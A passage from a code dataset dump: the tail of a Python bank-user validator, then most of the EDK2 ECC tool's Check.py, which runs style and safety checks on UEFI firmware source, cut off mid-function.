type(account) != str:\n return (False, \"Account must be a str\")\n if len(account) != 7:\n return (False, \"Account must have a valid format\")\n return (True, \"\")\n \n @staticmethod\n def validate_current_balance(current_balance: float) -> Tuple[bool, str]:\n if current_balance < 0:\n return (False, \"Current balance must be positive\")\n if type(current_balance) != float:\n return (False, \"Current balance must be a float\")\n return (True, \"\")\n \n def to_dict(self):\n return {\n \"name\": self.name,\n \"agency\": self.agency,\n \"account\": 
self.account,\n \"current_balance\": self.current_balance\n }","repo_name":"Maua-Dev/devbank_fernanda_e_yasmin","sub_path":"src/app/entities/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37608608869","text":"## @file\r\n# This file is used to define checkpoints used by ECC tool\r\n#\r\n# Copyright (c) 2021, Arm Limited. All rights reserved.
\r\n# Copyright (c) 2008 - 2020, Intel Corporation. All rights reserved.<BR>
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\nfrom __future__ import absolute_import\r\nimport Common.LongFilePathOs as os\r\nimport re\r\nfrom CommonDataClass.DataClass import *\r\nimport Common.DataType as DT\r\nfrom Ecc.EccToolError import *\r\nfrom Ecc.MetaDataParser import ParseHeaderCommentSection\r\nfrom Ecc import EccGlobalData\r\nfrom Ecc import c\r\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\r\nfrom Common.MultipleWorkspace import MultipleWorkspace as mws\r\n\r\n## Check\r\n#\r\n# This class is to define checkpoints used by ECC tool\r\n#\r\n# @param object: Inherited from object class\r\n#\r\nclass Check(object):\r\n def __init__(self):\r\n pass\r\n\r\n # Check all required checkpoints\r\n def Check(self):\r\n self.GeneralCheck()\r\n self.MetaDataFileCheck()\r\n self.DoxygenCheck()\r\n self.IncludeFileCheck()\r\n self.PredicateExpressionCheck()\r\n self.DeclAndDataTypeCheck()\r\n self.FunctionLayoutCheck()\r\n self.NamingConventionCheck()\r\n self.SmmCommParaCheck()\r\n\r\n def SmmCommParaCheck(self):\r\n self.SmmCommParaCheckBufferType()\r\n\r\n\r\n # Check if SMM communication function has correct parameter type\r\n # 1. Get function calling with instance./->Communicate() interface\r\n # and make sure the protocol instance is of type EFI_SMM_COMMUNICATION_PROTOCOL.\r\n # 2. Find the origin of the 2nd parameter of Communicate() interface, if -\r\n # a. it is a local buffer on stack\r\n # report error.\r\n # b. it is a global buffer, check the driver that holds the global buffer is of type DXE_RUNTIME_DRIVER\r\n # report success.\r\n # c. it is a buffer by AllocatePage/AllocatePool (may be wrapped by nested function calls),\r\n # check the EFI_MEMORY_TYPE to be EfiRuntimeServicesCode,EfiRuntimeServicesData,\r\n # EfiACPIMemoryNVS or EfiReservedMemoryType\r\n # report success.\r\n # d. it is a buffer located via EFI_SYSTEM_TABLE.ConfigurationTable (may be wrapped by nested function calls)\r\n # report warning to indicate human code review.\r\n # e. 
it is a buffer from other kind of pointers (may need to trace into nested function calls to locate),\r\n # repeat checks in a.b.c and d.\r\n def SmmCommParaCheckBufferType(self):\r\n if EccGlobalData.gConfig.SmmCommParaCheckBufferType == '1' or EccGlobalData.gConfig.SmmCommParaCheckAll == '1':\r\n EdkLogger.quiet(\"Checking SMM communication parameter type ...\")\r\n # Get all EFI_SMM_COMMUNICATION_PROTOCOL interface\r\n CommApiList = []\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s\r\n where Modifier = 'EFI_SMM_COMMUNICATION_PROTOCOL*' \"\"\" % (IdentifierTable)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n for Record in RecordSet:\r\n if Record[1] not in CommApiList:\r\n CommApiList.append(Record[1])\r\n # For each interface, check the second parameter\r\n for CommApi in CommApiList:\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, Value, BelongsToFile, StartLine from %s\r\n where Name = '%s->Communicate' and Model = %s\"\"\" \\\r\n % (IdentifierTable, CommApi, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n # print IdentifierTable\r\n for Record in RecordSet:\r\n # Get the second parameter for Communicate function\r\n SecondPara = Record[2].split(',')[1].strip()\r\n SecondParaIndex = None\r\n if SecondPara.startswith('&'):\r\n SecondPara = SecondPara[1:]\r\n if SecondPara.endswith(']'):\r\n SecondParaIndex = SecondPara[SecondPara.find('[') + 1:-1]\r\n SecondPara = SecondPara[:SecondPara.find('[')]\r\n # Get the ID\r\n Id = Record[0]\r\n # Get the BelongsToFile\r\n BelongsToFile = Record[3]\r\n # Get the source file path\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s\"\"\" % BelongsToFile\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n FullPath = NewRecordSet[0][0]\r\n # Get the line no of function calling\r\n StartLine = Record[4]\r\n # Get the module type\r\n SqlCommand = \"\"\"select Value3 from INF where BelongsToFile = (select ID from File\r\n where Path = (select Path from File where ID = %s) and Model = 1011)\r\n and Value2 = 'MODULE_TYPE'\"\"\" % BelongsToFile\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n ModuleType = NewRecordSet[0][0] if NewRecordSet else None\r\n\r\n # print BelongsToFile, FullPath, StartLine, ModuleType, SecondPara\r\n\r\n Value = FindPara(FullPath, SecondPara, StartLine)\r\n # Find the value of the parameter\r\n if Value:\r\n if 'AllocatePage' in Value \\\r\n or 'AllocatePool' in Value \\\r\n or 'AllocateRuntimePool' in Value \\\r\n or 'AllocateZeroPool' in Value:\r\n pass\r\n else:\r\n if '->' in Value:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. If it is correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n else:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. 
If it is correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n\r\n\r\n # Not find the value of the parameter\r\n else:\r\n SqlCommand = \"\"\"select ID, Modifier, Name, Value, Model, BelongsToFunction from %s\r\n where Name = '%s' and StartLine < %s order by StartLine DESC\"\"\" \\\r\n % (IdentifierTable, SecondPara, StartLine)\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if NewRecordSet:\r\n Value = NewRecordSet[0][1]\r\n if 'AllocatePage' in Value \\\r\n or 'AllocatePool' in Value \\\r\n or 'AllocateRuntimePool' in Value \\\r\n or 'AllocateZeroPool' in Value:\r\n pass\r\n else:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. If it is correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n else:\r\n pass\r\n\r\n # Check UNI files\r\n def UniCheck(self):\r\n if EccGlobalData.gConfig.GeneralCheckUni == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking whether UNI file is UTF-16 ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName like 'uni'\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n File = Record[1]\r\n FileIn = open(File, 'rb').read(2)\r\n if FileIn != '\\xff\\xfe':\r\n OtherMsg = \"File %s is not a valid UTF-16 UNI file\" % Record[1]\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_UNI, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # General Checking\r\n def GeneralCheck(self):\r\n self.GeneralCheckNonAcsii()\r\n self.UniCheck()\r\n self.GeneralCheckNoTab()\r\n self.GeneralCheckLineEnding()\r\n self.GeneralCheckTrailingWhiteSpaceLine()\r\n\r\n # Check whether NO Tab is used, replaced with spaces\r\n def GeneralCheckNoTab(self):\r\n if EccGlobalData.gConfig.GeneralCheckNoTab == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking No TAB used in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1]).readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n IndexOfChar = 0\r\n for Char in Line:\r\n IndexOfChar += 1\r\n if Char == '\\t':\r\n OtherMsg = \"File %s has TAB char at line %s column %s\" % (Record[1], IndexOfLine, IndexOfChar)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_NO_TAB, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check Only use CRLF (Carriage Return Line Feed) line endings.\r\n def GeneralCheckLineEnding(self):\r\n if EccGlobalData.gConfig.GeneralCheckLineEnding == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking line ending in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n 
if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1], 'rb').readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n if not bytes.decode(Line).endswith('\\r\\n'):\r\n OtherMsg = \"File %s has invalid line ending at line %s\" % (Record[1], IndexOfLine)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_INVALID_LINE_ENDING, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check if there is no trailing white space in one line.\r\n def GeneralCheckTrailingWhiteSpaceLine(self):\r\n if EccGlobalData.gConfig.GeneralCheckTrailingWhiteSpaceLine == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking trailing white space line in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1], 'r').readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n if Line.replace('\\r', '').replace('\\n', '').endswith(' '):\r\n OtherMsg = \"File %s has trailing white spaces at line %s\" % (Record[1], IndexOfLine)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_TRAILING_WHITE_SPACE_LINE, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check whether file has non ACSII char\r\n def GeneralCheckNonAcsii(self):\r\n if EccGlobalData.gConfig.GeneralCheckNonAcsii == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Non-ACSII char in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1]).readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n IndexOfChar = 0\r\n for Char in Line:\r\n IndexOfChar += 1\r\n if ord(Char) > 126:\r\n OtherMsg = \"File %s has Non-ASCII char at line %s column %s\" % (Record[1], IndexOfLine, IndexOfChar)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_NON_ACSII, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # C Function Layout Checking\r\n def FunctionLayoutCheck(self):\r\n self.FunctionLayoutCheckReturnType()\r\n self.FunctionLayoutCheckModifier()\r\n self.FunctionLayoutCheckName()\r\n self.FunctionLayoutCheckPrototype()\r\n self.FunctionLayoutCheckBody()\r\n self.FunctionLayoutCheckLocalVariable()\r\n self.FunctionLayoutCheckDeprecated()\r\n\r\n # To check if the deprecated functions are used\r\n def FunctionLayoutCheckDeprecated(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckNoDeprecated == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function no deprecated one being used ...\")\r\n\r\n DeprecatedFunctionSet = ('UnicodeValueToString',\r\n 'AsciiValueToString',\r\n 'StrCpy',\r\n 'StrnCpy',\r\n 'StrCat',\r\n 'StrnCat',\r\n 'UnicodeStrToAsciiStr',\r\n 'AsciiStrCpy',\r\n 'AsciiStrnCpy',\r\n 'AsciiStrCat',\r\n 'AsciiStrnCat',\r\n 'AsciiStrToUnicodeStr',\r\n 'PcdSet8',\r\n 'PcdSet16',\r\n 'PcdSet32',\r\n 'PcdSet64',\r\n 'PcdSetPtr',\r\n 
'PcdSetBool',\r\n 'PcdSetEx8',\r\n 'PcdSetEx16',\r\n 'PcdSetEx32',\r\n 'PcdSetEx64',\r\n 'PcdSetExPtr',\r\n 'PcdSetExBool',\r\n 'LibPcdSet8',\r\n 'LibPcdSet16',\r\n 'LibPcdSet32',\r\n 'LibPcdSet64',\r\n 'LibPcdSetPtr',\r\n 'LibPcdSetBool',\r\n 'LibPcdSetEx8',\r\n 'LibPcdSetEx16',\r\n 'LibPcdSetEx32',\r\n 'LibPcdSetEx64',\r\n 'LibPcdSetExPtr',\r\n 'LibPcdSetExBool',\r\n 'GetVariable',\r\n 'GetEfiGlobalVariable',\r\n )\r\n\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s\r\n where Model = %s \"\"\" % (IdentifierTable, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n for Key in DeprecatedFunctionSet:\r\n if Key == Record[1]:\r\n if not EccGlobalData.gException.IsException(ERROR_C_FUNCTION_LAYOUT_CHECK_NO_DEPRECATE, Key):\r\n OtherMsg = 'The function [%s] is deprecated which should NOT be used' % Key\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_C_FUNCTION_LAYOUT_CHECK_NO_DEPRECATE,\r\n OtherMsg=OtherMsg,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Record[0])\r\n\r\n def WalkTree(self):\r\n IgnoredPattern = c.GetIgnoredDirListPattern()\r\n for Dirpath, Dirnames, Filenames in os.walk(EccGlobalData.gTarget):\r\n for Dir in Dirnames:\r\n Dirname = os.path.join(Dirpath, Dir)\r\n if os.path.islink(Dirname):\r\n Dirname = os.path.realpath(Dirname)\r\n if os.path.isdir(Dirname):\r\n # symlinks to directories are treated as directories\r\n Dirnames.remove(Dir)\r\n Dirnames.append(Dirname)\r\n if IgnoredPattern.match(Dirpath.upper()):\r\n continue\r\n for f in Filenames[:]:\r\n if f.lower() in EccGlobalData.gConfig.SkipFileList:\r\n Filenames.remove(f)\r\n yield (Dirpath, Dirnames, Filenames)\r\n\r\n # Check whether return type exists and in the first line\r\n def FunctionLayoutCheckReturnType(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckReturnType == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout return type ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutReturnType(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutReturnType(FullName)\r\n\r\n # Check whether any optional functional modifiers exist and next to the return type\r\n def FunctionLayoutCheckModifier(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckOptionalFunctionalModifier == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout modifier ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutModifier(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutModifier(FullName)\r\n\r\n # Check whether the next line contains the function name, left justified, followed by the beginning of the parameter list\r\n # Check whether the closing parenthesis is on its own line and also indented two spaces\r\n def FunctionLayoutCheckName(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionName == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or 
EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function name ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutName(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutName(FullName)\r\n\r\n # Check whether the function prototypes in include files have the same form as function definitions\r\n def FunctionLayoutCheckPrototype(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionPrototype == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function prototype ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[PROTOTYPE]\" + FullName)\r\n# c.CheckFuncLayoutPrototype(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[PROTOTYPE]\" + FullName)\r\n c.CheckFuncLayoutPrototype(FullName)\r\n\r\n # Check whether the body of a function is contained by open and close braces that must be in the first column\r\n def FunctionLayoutCheckBody(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionBody == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function body ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutBody(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n c.CheckFuncLayoutBody(FullName)\r\n\r\n # Check whether the data declarations is the first code in a module.\r\n # self.CFunctionLayoutCheckDataDeclaration = 1\r\n # Check whether no initialization of a variable as part of its declaration\r\n def FunctionLayoutCheckLocalVariable(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckNoInitOfVariable == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout local variables ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutLocalVariable(FullName)\r\n\r\n for FullName in EccGlobalData.gCFileList:\r\n c.CheckFuncLayoutLocalVariable(FullName)\r\n\r\n # Check whether no use of STATIC for functions\r\n # self.CFunctionLayoutCheckNoStatic = 1\r\n\r\n # Declarations and Data Types Checking\r\n def DeclAndDataTypeCheck(self):\r\n self.DeclCheckNoUseCType()\r\n self.DeclCheckInOutModifier()\r\n self.DeclCheckEFIAPIModifier()\r\n self.DeclCheckEnumeratedType()\r\n self.DeclCheckStructureDeclaration()\r\n self.DeclCheckSameStructure()\r\n self.DeclCheckUnionType()\r\n\r\n\r\n # Check whether no use of int, unsigned, char, void, long in any .c, .h or .asl files.\r\n def DeclCheckNoUseCType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckNoUseCType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration No use C type ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in 
self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckDeclNoUseCType(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckDeclNoUseCType(FullName)\r\n\r\n # Check whether the modifiers IN, OUT, OPTIONAL, and UNALIGNED are used only to qualify arguments to a function and should not appear in a data type declaration\r\n def DeclCheckInOutModifier(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckInOutModifier == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration argument modifier ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckDeclArgModifier(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckDeclArgModifier(FullName)\r\n\r\n # Check whether the EFIAPI modifier should be used at the entry of drivers, events, and member functions of protocols\r\n def DeclCheckEFIAPIModifier(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckEFIAPIModifier == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n pass\r\n\r\n # Check whether Enumerated Type has a 'typedef' and the name is capital\r\n def DeclCheckEnumeratedType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckEnumeratedType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration enum typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[ENUM]\" + FullName)\r\n# c.CheckDeclEnumTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[ENUM]\" + FullName)\r\n c.CheckDeclEnumTypedef(FullName)\r\n\r\n # Check whether Structure Type has a 'typedef' and the name is capital\r\n def DeclCheckStructureDeclaration(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckStructureDeclaration == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration struct typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[STRUCT]\" + FullName)\r\n# c.CheckDeclStructTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[STRUCT]\" + FullName)\r\n c.CheckDeclStructTypedef(FullName)\r\n\r\n # Check whether having same Structure\r\n def DeclCheckSameStructure(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckSameStructure == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking same struct ...\")\r\n AllStructure = {}\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s where Model = %s\"\"\" % (IdentifierTable, MODEL_IDENTIFIER_STRUCTURE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n 
for Record in RecordSet:\r\n if Record[1] != '':\r\n if Record[1] not in AllStructure.keys():\r\n AllStructure[Record[1]] = Record[2]\r\n else:\r\n ID = AllStructure[Record[1]]\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s \"\"\" % ID\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n OtherMsg = \"The structure name '%s' is duplicated\" % Record[1]\r\n if NewRecordSet != []:\r\n OtherMsg = \"The structure name [%s] duplicates the one defined in %s; the struct may NOT be typedef'ed, or the new typedef name may NOT be used to qualify variables\" % (Record[1], NewRecordSet[0][0])\r\n if not EccGlobalData.gException.IsException(ERROR_DECLARATION_DATA_TYPE_CHECK_SAME_STRUCTURE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DECLARATION_DATA_TYPE_CHECK_SAME_STRUCTURE, OtherMsg=OtherMsg, BelongsToTable=IdentifierTable, BelongsToItem=Record[0])\r\n\r\n # Check whether Union Type has a 'typedef' and the name is capital\r\n def DeclCheckUnionType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckUnionType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration union typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[UNION]\" + FullName)\r\n# c.CheckDeclUnionTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[UNION]\" + FullName)\r\n c.CheckDeclUnionTypedef(FullName)\r\n\r\n # Predicate Expression Checking\r\n def PredicateExpressionCheck(self):\r\n self.PredicateExpressionCheckBooleanValue()\r\n self.PredicateExpressionCheckNonBooleanOperator()\r\n self.PredicateExpressionCheckComparisonNullType()\r\n\r\n # Check that variables of type BOOLEAN do not use explicit comparisons to TRUE or FALSE\r\n def PredicateExpressionCheckBooleanValue(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckBooleanValue == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression Boolean value ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[BOOLEAN]\" + FullName)\r\n# c.CheckBooleanValueComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[BOOLEAN]\" + FullName)\r\n c.CheckBooleanValueComparison(FullName)\r\n\r\n # Check whether Non-Boolean comparisons use a compare operator (==, !=, >, <, >=, <=).\r\n def PredicateExpressionCheckNonBooleanOperator(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckNonBooleanOperator == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression Non-Boolean variable ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[NON-BOOLEAN]\" + FullName)\r\n# c.CheckNonBooleanValueComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n 